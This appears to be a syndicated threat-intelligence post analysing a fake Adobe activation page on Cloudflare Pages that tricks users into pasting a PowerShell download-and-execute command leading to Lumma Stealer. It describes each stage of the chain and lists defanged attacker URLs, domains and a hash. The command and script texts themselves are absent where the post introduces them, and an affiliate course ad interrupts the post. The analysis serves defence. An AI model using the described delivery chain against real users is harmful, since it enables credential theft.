ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer

While looking for phishing sites, I came across a suspicious Cloudflare Pages site hosted at:

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

hxxps://zipsage.pages[.]dev

The site presents itself as an “Adobe Activation Guide” and instructs users to manually execute a PowerShell command, a technique commonly associated with ClickFix malware delivery.

Fake Adobe Activation Page

The landing page attempts to socially engineer users into copying and executing a malicious PowerShell command under the pretense of activating Adobe software.

The page instructs users to execute the following command:

The Base64-decoded command is:

This uses Invoke-RestMethod (irm) to download a remote PowerShell script and immediately execute it in memory using Invoke-Expression (iex).

PowerShell Stage

The retrieved PowerShell script downloads and launches a JavaScript file from the same infrastructure.

Script.ps1:

The script downloads script.js into the temporary directory and executes it silently using wscript.exe.

JavaScript Downloader

The downloaded JavaScript file is heavily obfuscated and acts as a downloader/dropper.

The script downloads:

hxxps://get-1o8.pages[.]dev/putty.exe

The payload is stored as:

%TEMP%\putty.exe

Behavior observed from the JavaScript:

• Downloads putty.exe
• Executes the file
• Waits for execution to finish
• Deletes the payload afterward
• Deletes the script itself

This cleanup behavior likely attempts to reduce forensic evidence on infected systems.

Lumma Stealer Network Activity

During execution, the sample generated multiple DNS and HTTP requests associated with Lumma Stealer infrastructure.

Observed domains:

sustainskelet[.]lat
sweepyribs[.]lat
grannyejh[.]lat
discokeyus[.]lat
necklacebudi[.]lat
energyaffai[.]lat
aspecteirs[.]lat
crosshuaht[.]lat
rapeflowwj[.]lat

The payload repeatedly generated POST requests to /api endpoints across multiple .lat domains, behavior consistent with Lumma Stealer activity.

IOC

URLs

hxxps://zipsage.pages[.]dev
hxxps://get-1o8.pages[.]dev/script.ps1
hxxps://get-1o8.pages[.]dev/script.js
hxxps://get-1o8.pages[.]dev/putty.exe

Domains

get-1o8.pages[.]dev
zipsage.pages[.]dev
sustainskelet[.]lat
sweepyribs[.]lat
grannyejh[.]lat
discokeyus[.]lat
necklacebudi[.]lat
energyaffai[.]lat
aspecteirs[.]lat
crosshuaht[.]lat
rapeflowwj[.]lat
steamcommunity.com

File Hash

MD5: 3b8d7692966df16dde1da2887378e062

Dropped File

%TEMP%\putty.exe

Article Link: ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer – Malware Analysis, Phishing, and Email Scams

1 post - 1 participant

Read full topic

Malware Analysis, News and Indicators - Latest topics